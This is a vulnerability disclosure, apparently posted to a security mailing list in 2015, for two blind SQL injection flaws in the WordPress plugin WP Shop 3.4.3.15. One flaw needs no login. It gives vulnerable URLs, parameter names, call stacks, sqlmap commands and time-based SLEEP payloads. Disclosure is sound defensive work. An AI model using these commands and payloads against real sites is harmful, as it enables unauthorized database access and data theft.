Subject: Blind SQL injections in WP Shop 3.4.3.15
Date: Wed, 8 Jul 2015 22:52:30 +0200

Hello,

Plugin: WP Shop 3.4.3.15 https://wordpress.org/plugins/wp-shop-original/

Remote unauthenticated attackers and authenticated users can execute arbitrary SQL commands.

1. SQL injection (cart_save()) (unauthenticated)

Method: POST
Url: http://localhost/wp-admin/admin-ajax.php?action=cart_save
Vulnerable parameter: wpshop_id

Example PHP callstack:

cart_save   [/tmp/wpplugin/wp-shop-original/ajax.php:182]
wpdb::get_results 

Sqlmap verification:

sqlmap --method POST --dbms mysql --data "wpshop_id=1" -u http://localhost/wp-admin/admin-ajax.php?action=cart_save -p wpshop_id

...
Parameter: wpshop_id (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: wpshop_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))JkxC)
...


2. SQL injection (getDigitalOrder()) (authenticated users)

Method: POST
Url: http://localhost/?wpdownload=1&order_id=[sqli]
Vulnerable parameter: order_id

Please note that attacker needs valid post_id with digital_link meta.

Example PHP callstack:

Wpshop_Boot::__construct   [/wp-shop-original/classes/class.Wpshop.Boot.php:42]
Wpshop_Digital::__construct   [/wp-shop-original/classes/class.Wpshop.Digital.php:7]
Wpshop_Digital::checkLink   [/wp-shop-original/classes/class.Wpshop.Digital.php:43]
Wpshop_Digital::getDigitalOrder   [/wp-shop-original/classes/class.Wpshop.Digital.php:33]
wpdb::get_results

Sqlmap verification:

sqlmap --cookie "..." --dbms mysql -u "http://localhost/?wpdownload=1&order_id=1" -p order_id

...
Parameter: order_id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: wpdownload=1&order_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nWlh)
...

https://wordpress.org/plugins/wp-shop-original/


-- 
Regards,
Marcin Probola,